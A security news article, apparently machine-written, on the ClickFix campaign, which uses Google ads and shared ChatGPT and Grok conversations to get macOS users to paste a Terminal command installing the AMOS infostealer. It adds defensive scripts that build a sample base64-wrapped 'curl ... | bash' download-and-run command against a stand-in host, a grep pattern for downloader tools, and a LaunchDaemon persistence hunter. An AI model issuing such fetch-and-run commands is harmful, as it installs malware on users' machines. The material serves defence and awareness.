Ethical Hacking News
A new attack campaign, dubbed "ClickFix", abuses legitimate AI platforms such as ChatGPT and Grok to distribute AMOS, a macOS-only infostealer. Google search ads lure victims to shared LLM conversations that appear to offer helpful troubleshooting instructions but in fact tell them to paste a command into Terminal that installs the malware. AMOS targets cryptocurrency wallets, browser data, the macOS Keychain and files on disk; it is rented under a malware-as-a-service (MaaS) model for $1,000 per month and uses a LaunchDaemon watchdog to restart itself if terminated. Users should not execute commands they find online without understanding what those commands do.
Researchers have observed a surge in malicious activity in which hackers abuse legitimate AI platforms such as ChatGPT and Grok to distribute the macOS-specific infostealer AMOS. The campaign, dubbed "ClickFix", uses Google search ads to lure users into chatbot conversations that appear to offer helpful instructions but ultimately lead to the malware being installed on the victim's system.
The ClickFix attack begins with victims searching for terms related to macOS maintenance, problem-solving or troubleshooting. The Google ad links directly to a shared conversation hosted on a legitimate LLM platform, and that conversation contains the malicious instructions that install the malware. Researchers at Kaspersky were among the first to spot the campaign; Huntress, a managed security platform, later published a more detailed report.
Huntress researchers confirmed that the campaign is not an isolated incident but a deliberate, widespread poisoning of common troubleshooting queries. They reproduced the poisoned results across multiple variations of the same question, such as "how to clear data on iMac" or "clear system data on iMac", which shows both the scope and the planning behind the attack.
If a user falls for the trick and pastes the command from the AI chat into the macOS Terminal, the command decodes a base64-encoded URL, fetches a bash script from it and runs it. That script displays a fake password prompt dressed up as a system update, tricking the user into handing over their password or running further malicious commands on their system.
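The practical check a user (or a help-desk analyst) can make before running such a command is to decode the base64 blob without executing it and read what it would fetch. The script below is an added example and is not code from the article, Huntress or Kaspersky; the sample command it inspects is constructed for the demo (the host name example.invalid is a reserved name that never resolves), and the shape of the command is an assumption modelled on the article's description.

```shell
#!/bin/sh
# Added example, not code from the article, Huntress or Kaspersky: decode the
# base64 blob inside a pasted "fix" command WITHOUT running it, so you can read
# what it would fetch or execute. The sample command is constructed here for
# illustration; "example.invalid" is a reserved name that never resolves.

# Print every long base64-looking token (40+ base64-alphabet chars, optional
# padding) found in the command text, one per line.
extract_b64_tokens() {
    printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/]{40,}={0,2}'
}

# Decode each token to text; tokens that are not valid base64 are skipped.
# --decode is accepted by both GNU coreutils base64 and the macOS base64.
decode_b64_tokens() {
    extract_b64_tokens "$1" | while IFS= read -r tok; do
        printf '%s' "$tok" | base64 --decode 2>/dev/null && printf '\n'
    done
}

# Return 0 (true) when the decoded payload downloads or executes something:
# a URL, curl/wget, a pipe into sh/bash, or osascript (used for fake dialogs).
looks_like_downloader() {
    decoded=$(decode_b64_tokens "$1")
    printf '%s' "$decoded" | grep -qiE 'curl|wget|https?://|\| *(ba)?sh( |$)|osascript'
}

# Constructed sample in the shape the article describes: a base64-encoded
# fetch-and-run command wrapped in "echo ... | base64 --decode | bash".
INNER='curl -s https://example.invalid/update.sh | bash'
SAMPLE_CMD="echo $(printf '%s' "$INNER" | base64 | tr -d '\n') | base64 --decode | bash"

echo "Pasted command : $SAMPLE_CMD"
echo "Decodes to     : $(decode_b64_tokens "$SAMPLE_CMD")"
if looks_like_downloader "$SAMPLE_CMD"; then
    echo "WARNING: this command downloads and executes remote code; do not run it."
fi
```

A benign maintenance command such as `sudo rm -rf ~/Library/Caches/*` contains no base64 token, so `decode_b64_tokens` prints nothing and `looks_like_downloader` returns false; the ClickFix-style command decodes to a `curl ... | bash` one-liner, which is the thing to refuse to run.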
The AMOS infostealer targets macOS systems exclusively and has been documented since April 2023. It is sold under a malware-as-a-service (MaaS) model, with the infostealer rented out for $1,000 per month. The malware is known to target cryptocurrency wallets from various providers, browser data such as cookies and saved passwords, macOS Keychain data, and files on the filesystem.
To entrench itself on the victim's system, AMOS installs a LaunchDaemon (com.finder.helper.plist) that runs a hidden AppleScript acting as a watchdog loop: if the malware process is terminated, the script restarts it within one second, giving the infostealer persistence. System LaunchDaemons live in /Library/LaunchDaemons and need administrator rights to install, so a daemon there that runs osascript or a script from a user-writable path is worth a close look.
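As an added example (not code from the article or from Huntress), the following script hunts a LaunchDaemons directory for jobs whose ProgramArguments invoke osascript or point at a program under /tmp, /var/tmp or /Users, which is the shape of the watchdog persistence described above. The two plists it writes into a temporary directory are constructed fixtures: the file name com.finder.helper.plist comes from the article, but the Label value, the osascript invocation and the script path inside it are assumptions for the demo, not the real job's contents. On a Mac you would point `scan_launchdaemons` at /Library/LaunchDaemons instead.

```shell
#!/bin/sh
# Added example, not code from the article or Huntress: hunt a LaunchDaemons
# directory for jobs that run osascript or a program in a user-writable path,
# the shape of the AMOS watchdog persistence the article describes. The plists
# written by make_demo_dir are constructed for the demo; the Label and script
# path inside com.finder.helper.plist are assumptions, not the real job.
# On a Mac, run: scan_launchdaemons /Library/LaunchDaemons

# Label of a job, read with grep/sed so this also runs where plutil is absent.
plist_label() {
    grep -A1 '<key>Label</key>' "$1" \
        | sed -n 's/.*<string>\(.*\)<\/string>.*/\1/p' | head -n 1
}

# ProgramArguments strings joined by single spaces.
program_args() {
    args=$(sed -n '/<key>ProgramArguments<\/key>/,/<\/array>/p' "$1" \
           | sed -n 's/.*<string>\(.*\)<\/string>.*/\1/p' | tr '\n' ' ')
    printf '%s\n' "${args% }"
}

# True when the job invokes osascript, or runs something from /tmp, /var/tmp,
# /private/tmp or a home directory under /Users; daemons shipped by Apple or
# by properly installed software do not normally run from those locations.
is_suspicious() {
    program_args "$1" \
        | grep -qE '(^| )(/usr/bin/)?osascript( |$)|(^| )/(private/)?(tmp|var/tmp|Users)/'
}

# Print "path<TAB>label<TAB>args" for each suspicious job; return 0 if any found.
scan_launchdaemons() {
    found=1
    for f in "$1"/*.plist; do
        [ -e "$f" ] || continue
        if is_suspicious "$f"; then
            printf '%s\t%s\t%s\n' "$f" "$(plist_label "$f")" "$(program_args "$f")"
            found=0
        fi
    done
    return $found
}

# Constructed fixture: one benign-looking job and one watchdog-style job.
make_demo_dir() {
    d=$(mktemp -d)
    cat > "$d/com.example.backupagent.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.backupagent</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/local/bin/backupagent</string>
        <string>--daemon</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
EOF
    cat > "$d/com.finder.helper.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.finder.helper</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/osascript</string>
        <string>/Users/Shared/.helper/watchdog.scpt</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <true/>
</dict>
</plist>
EOF
    printf '%s\n' "$d"
}

demo=$(make_demo_dir)
scan_launchdaemons "$demo" || echo "no suspicious LaunchDaemons in $demo"
rm -rf "$demo"
```

Once a job like this is found on a real system, unload it with `sudo launchctl bootout system /Library/LaunchDaemons/<name>.plist` before deleting the plist and the script it points at; removing the script first just makes the KeepAlive watchdog respawn until the job itself is gone.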
The ClickFix campaign is yet another example of threat actors using legitimate platforms to spread malicious content. Users need to be vigilant and avoid executing commands they find online without fully understanding their implications. Kaspersky noted that even after landing in a manipulated LLM conversation, a simple follow-up question to the chatbot about what the command does can reveal whether the instructions are safe.
As users navigate the complex landscape of AI-powered tools and search engines, it's essential to remember that not all advice or prompts are created equal. Being cautious about where you find your answers can significantly reduce your risk exposure to this type of malicious activity.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Attack-Campaign-Uses-Legitimate-AI-Platforms-to-Distribute-Mac-Malware-ehn.shtml
https://www.bleepingcomputer.com/news/security/google-ads-for-shared-chatgpt-grok-guides-push-macos-infostealer-malware/
https://malwaretips.com/threads/attackers-are-using-google-ads-that-appear-in-mac-troubleshooting-searches-to-lure-users-to-a-fake-chatgpt-chat-which-instructs-them-to-run-malware.138647/
https://www.huntress.com/blog/amos-stealer-chatgpt-grok-ai-trust
Published: Wed Dec 10 17:58:13 2025 by llama3.2 3B Q4_K_M